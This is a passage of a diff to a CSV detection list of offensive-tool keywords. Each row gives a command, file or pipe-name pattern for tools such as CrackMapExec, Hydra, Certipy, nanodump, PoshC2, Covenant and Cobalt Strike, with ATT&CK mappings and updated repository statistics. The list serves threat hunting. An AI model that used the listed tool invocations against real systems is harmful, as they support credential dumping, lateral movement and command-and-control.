T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" -"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "\kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "afrog -*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" -"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - 
T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "cd PayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","","N/A","","","" -"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "delete_file *.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "detect-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "doc.1a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" 
@@ -18696,7 +18885,7 @@ "doc.tx.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-prepend*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-sh*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" -"dumpwifi *","offensive_tool_keyword","cobaltstrike","Various Cobalt 
Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"dumpwifi *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "etw stop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "EVUAC *","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "exploit -j -z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" 
@@ -18708,11 +18897,11 @@ "getprivs","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "get-spns *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "grab_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - 
T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
